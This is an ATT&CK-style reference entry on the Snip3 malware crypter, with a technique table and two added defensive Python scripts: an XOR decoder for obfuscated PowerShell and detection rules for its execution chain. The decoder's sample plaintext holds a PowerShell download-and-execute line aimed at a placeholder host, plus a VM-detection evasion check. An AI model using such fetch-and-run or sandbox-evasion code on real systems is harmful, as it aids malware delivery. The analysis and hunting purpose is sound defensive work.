S1086 Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[2][1]
| Item | Value |
|---|---|
| ID | S1086 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.0 |
| Created | 13 September 2023 |
| Last Modified | 10 October 2023 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Snip3 can create a VBS file in the Startup folder to persist across system restarts.[1] |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Snip3 can use a PowerShell script for second-stage execution.[2][1] |
| enterprise | T1059.005 | Visual Basic | Snip3 can use Visual Basic scripts for first-stage execution.[2][1] |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | Snip3 can decode its second-stage PowerShell script prior to execution.[2] |
| enterprise | T1189 | Drive-by Compromise | Snip3 has been delivered to targets via downloads from malicious domains.[1] |
| enterprise | T1564 | Hide Artifacts | - |
| enterprise | T1564.003 | Hidden Window | Snip3 can execute PowerShell scripts in a hidden window.[2] |
| enterprise | T1105 | Ingress Tool Transfer | Snip3 can download additional payloads to compromised systems.[2][1] |
| enterprise | T1104 | Multi-Stage Channels | Snip3 can download and execute additional payloads and modules over separate communication channels.[2][1] |
| enterprise | T1027 | Obfuscated Files or Information | Snip3 has the ability to obfuscate strings using XOR encryption.[2] |
| enterprise | T1027.001 | Binary Padding | Snip3 can obfuscate strings using junk Chinese characters.[2] |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.001 | Spearphishing Attachment | Snip3 has been delivered to victims through malicious e-mail attachments.[1] |
| enterprise | T1566.002 | Spearphishing Link | Snip3 has been delivered to victims through e-mail links to malicious files.[1] |
| enterprise | T1055 | Process Injection | - |
| enterprise | T1055.012 | Process Hollowing | Snip3 can use RunPE to execute malicious payloads within a hollowed Windows process.[2][1] |
| enterprise | T1082 | System Information Discovery | Snip3 has the ability to query Win32_ComputerSystem for system information.[2] |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.001 | Malicious Link | Snip3 has been executed by luring victims into clicking malicious links.[1] |
| enterprise | T1204.002 | Malicious File | Snip3 can gain execution through the download and opening of Visual Basic script files.[2][1] |
| enterprise | T1497 | Virtualization/Sandbox Evasion | - |
| enterprise | T1497.001 | System Checks | Snip3 has the ability to detect Windows Sandbox, VMware, or VirtualBox by querying Win32_ComputerSystem to extract the Manufacturer string.[2] |
| enterprise | T1497.003 | Time Based Checks | Snip3 can execute WScript.Sleep to delay execution of its second stage.[2] |
| enterprise | T1102 | Web Service | Snip3 can download additional payloads from web services including Pastebin and top4top.[2] |
| enterprise | T1047 | Windows Management Instrumentation | Snip3 can query the WMI class Win32_ComputerSystem to gather information.[2] |
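The T1027 and T1140 rows above say only that Snip3 XOR-obfuscates strings and decodes its second-stage PowerShell before running it. The following Python is an added analyst helper, not Snip3's code and not from the ATT&CK entry: it assumes the simplest case, a single-byte XOR key over the raw script bytes (a crypter may use a longer key or a different scheme entirely), brute-forces all 255 keys, and ranks candidates by how much the output looks like PowerShell. The sample blob, the marker keywords, and the `example.invalid` URL are all constructed for the demonstration.

```python
"""Single-byte XOR recovery for an obfuscated PowerShell stage.

Added example, not Snip3's own routine. Assumption: the stage is the
script bytes XORed with one key byte. The ranking heuristic (printable
ratio plus PowerShell keyword hits) is what lets an analyst pick the key
without knowing it in advance.
"""
import string

# Keywords whose presence suggests a decoded PowerShell second stage (assumed list).
PS_MARKERS = (b"powershell", b"Invoke-Expression", b"IEX", b"FromBase64String",
              b"DownloadString", b"Win32_ComputerSystem", b"Start-Sleep")

PRINTABLE = set(bytes(string.printable, "ascii"))


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single key byte (its own inverse)."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> int:
    """Higher is more PowerShell-like: percent printable plus 50 per keyword hit."""
    if not candidate:
        return 0
    printable = sum(1 for b in candidate if b in PRINTABLE)
    ratio = printable * 100 // len(candidate)
    hits = sum(candidate.count(m) for m in PS_MARKERS)
    return ratio + 50 * hits


def recover_xor_stage(blob: bytes):
    """Try every non-zero single-byte key; return (key, plaintext, score) for the best one."""
    ranked = []
    for key in range(1, 256):
        pt = xor_bytes(blob, key)
        ranked.append((key, pt, score(pt)))
    ranked.sort(key=lambda t: t[2], reverse=True)
    return ranked[0]


# Constructed sample: a benign stand-in for a second stage that performs the
# kind of WMI manufacturer check and delay the table describes, XORed with 0x5A.
SAMPLE_PLAINTEXT = (
    b"$cs = Get-WmiObject Win32_ComputerSystem\n"
    b"if ($cs.Manufacturer -match 'VMware|VirtualBox') { exit }\n"
    b"Start-Sleep -Seconds 30\n"
    b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage3')\n"
)
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, 0x5A)

if __name__ == "__main__":
    key, text, s = recover_xor_stage(SAMPLE_BLOB)
    print(f"recovered key=0x{key:02x} score={s}")
    print(text.decode("ascii", "replace"))
```

Feed `recover_xor_stage` the bytes extracted from the first-stage VBS (after stripping any junk padding characters) and inspect the top-scoring candidate; if nothing scores well, the key is longer than one byte or the encoding is layered with Base64, and the heuristic needs to be applied after the outer layer is removed.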
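Several rows in the table describe one observable chain: a VBS first stage (T1059.005) launching PowerShell in a hidden window (T1059.001, T1564.003), the script querying Win32_ComputerSystem for the Manufacturer string to spot a VM or sandbox (T1047, T1082, T1497.001), and a VBS dropped into the Startup folder for persistence (T1547.001). The Python below is an added hunting example, not detection content from the ATT&CK entry or from any vendor: it runs three rule functions over constructed, Sysmon-like event dicts and correlates hits per host. The event field names (`parent_image`, `command_line`, `target_filename`, `script_text`) and the host names are assumptions to be mapped onto your own telemetry schema.

```python
"""Hunting rules for the Snip3 execution chain summarised in the table.

Added example, not part of the ATT&CK entry. Events are constructed dicts
modelled on Sysmon process-create / file-create events and PowerShell
script-block logging; field names are assumptions.
"""
import re

# Startup-folder .vbs drop (T1547.001).
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.vbs$", re.I)
# "-w hidden", "-WindowStyle Hidden" and abbreviations in between (T1564.003).
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
WMI_RE = re.compile(r"Win32_ComputerSystem", re.I)
MANUF_RE = re.compile(r"Manufacturer", re.I)
SANDBOX_RE = re.compile(r"VMware|VirtualBox|Windows Sandbox", re.I)


def check_process(ev):
    """Script host spawning PowerShell: T1059.005 -> T1059.001, plus T1564.003 if hidden."""
    parent = ev.get("parent_image", "").lower()
    image = ev.get("image", "").lower()
    cmd = ev.get("command_line", "")
    if parent.endswith(("wscript.exe", "cscript.exe")) and image.endswith(("powershell.exe", "pwsh.exe")):
        techs = ["T1059.005", "T1059.001"]
        if HIDDEN_RE.search(cmd):
            techs.append("T1564.003")
        return {"host": ev["host"], "techniques": techs, "evidence": cmd}
    return None


def check_file(ev):
    """VBS written into a user's Startup folder: T1547.001."""
    target = ev.get("target_filename", "")
    if STARTUP_RE.search(target):
        return {"host": ev["host"], "techniques": ["T1547.001"], "evidence": target}
    return None


def check_scriptblock(ev):
    """Win32_ComputerSystem query: T1047/T1082, plus T1497.001 if Manufacturer is matched against VM vendors."""
    text = ev.get("script_text", "")
    if WMI_RE.search(text):
        techs = ["T1047", "T1082"]
        if MANUF_RE.search(text) and SANDBOX_RE.search(text):
            techs.append("T1497.001")
        return {"host": ev["host"], "techniques": techs, "evidence": text.strip()[:120]}
    return None


CHECKS = {"process_create": check_process, "file_create": check_file, "script_block": check_scriptblock}


def detect(events):
    """Run the rule matching each event's type; return the list of findings."""
    findings = []
    for ev in events:
        rule = CHECKS.get(ev.get("type"))
        hit = rule(ev) if rule else None
        if hit:
            findings.append(hit)
    return findings


def hosts_with_chain(findings, needed=("T1059.001", "T1047")):
    """Hosts on which both the PowerShell launch and the WMI fingerprinting fired."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).update(f["techniques"])
    return sorted(h for h, t in by_host.items() if set(needed) <= t)


# Constructed sample events (not real telemetry); WS02 is a benign control case.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Public\s.ps1"},
    {"type": "script_block", "host": "WS01",
     "script_text": "$m=(Get-WmiObject Win32_ComputerSystem).Manufacturer; if($m -match 'VMware|VirtualBox'){exit}"},
    {"type": "file_create", "host": "WS01",
     "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"type": "process_create", "host": "WS02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile Get-Process"},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f["host"], ",".join(f["techniques"]), "|", f["evidence"])
    print("full chain observed on:", hosts_with_chain(hits))
```

Each rule alone is noisy (administrators query Win32_ComputerSystem, and some installers write to Startup), which is why `hosts_with_chain` only escalates hosts where the script-host-to-PowerShell launch and the WMI fingerprinting both appear; the Startup-folder drop and the Manufacturer check against VM vendor strings then raise confidence further.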
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G1018 | TA2541 | [3][2] |
References
1. Jornet, A. (2021, December 23). Snip3, an investigation into malware. Retrieved September 19, 2023.
2. Lorber, N. (2021, May 7). Revealing the Snip3 Crypter, a Highly Evasive RAT Loader. Retrieved September 13, 2023.
3. Larson, S. and Wise, J. (2022, February 15). Charting TA2541's Flight. Retrieved September 12, 2023.